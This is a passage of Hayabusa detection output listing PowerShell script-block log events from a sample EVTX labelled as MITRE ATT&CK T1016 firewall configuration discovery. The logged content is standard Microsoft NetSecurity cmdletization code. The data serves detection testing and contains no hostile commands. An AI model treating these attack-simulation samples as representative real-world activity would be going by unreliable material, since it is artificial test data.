$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 